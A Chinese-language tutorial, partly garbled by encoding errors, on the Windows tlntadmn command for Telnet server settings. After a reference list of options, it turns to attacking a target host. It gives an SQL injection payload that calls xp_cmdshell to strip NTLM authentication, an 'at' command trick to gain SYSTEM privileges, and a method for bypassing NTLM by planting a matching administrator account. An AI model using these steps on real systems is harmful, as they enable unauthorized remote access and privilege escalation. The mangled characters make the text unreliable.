導讀:telnet可以幫助我們完成遠程的登錄設置���,那么管理員如何對端口認證等系統(tǒng)進行管理呢?
這里我們就來介紹一下tlntadmn命令的用法�����。這個命令可以幫助我們完成telnet服務的這些設置���。那么,tlntadmn是telnet服務的設置命令,可以對telnet服務的端口��、認證方式等進行設置:
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
所有會話用 'all'.
1.-s sessionid 列出會話的信息.
2.-k sessionid 終止會話.
3.-m sessionid 發(fā)送消息到會話.
4.config 配置Telnet服務器參數(shù).
5.
6.common_options 為:
7.-u user 指定要使用其憑據(jù)的用戶
8.-p password 用戶密碼
9.config_options 為:
10.dom = domain 設定用戶的默認域
11.ctrlakeymap = yes|no 設定 ALT 鍵的映射
12.timeout = hh:mm:ss 設定空閑會話超時值 timeoutactive = yes|no 啟用空閑會話.
13.maxfail = attempts 設定斷開前失敗的登錄企圖數(shù).
14.maxconn = connections 設定最大連接數(shù).
15.port = number 設定Telnet端口.
16.sec = [+/-]NTLM [+/-]passwd 設定身份驗證機構
17.fname = file 指定審計文件名.
18.fsize = size 指定審計文件的最大尺寸(MB).
19.mode = console|stream 指定操作模式.
20.auditlocation = eventlog|file|both 指定記錄地點
21.audit = [+/-]user [+/-]fail [+/-]admin 指定審計的事件
使用的辦法:
直接運行命令:tlntadmn config sec = -ntlm
注射的話可以直接運行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--運行以后就去掉了ntlm認證.
1.C:\>tlntadmn config sec = -ntlm -----------------使用admin權限
2.C:\>at 20:43 /interactive "cmd" -----------at命令啟用system權限
3.新加了一項作業(yè),其作業(yè) ID = 1
4.C:\WINNT\system32>tlntadmn config sec = -ntlm
去除NTML驗證的另一個方法:在目標主機上建立好一個管理員用戶!在本機建立一個和目標主機上相同的帳號密碼的用戶,在本機CMD上右擊選擇運行方式~ 輸入該帳號和密碼,直接Telnet服務的目標IP, 既可直接饒過NTML驗證.
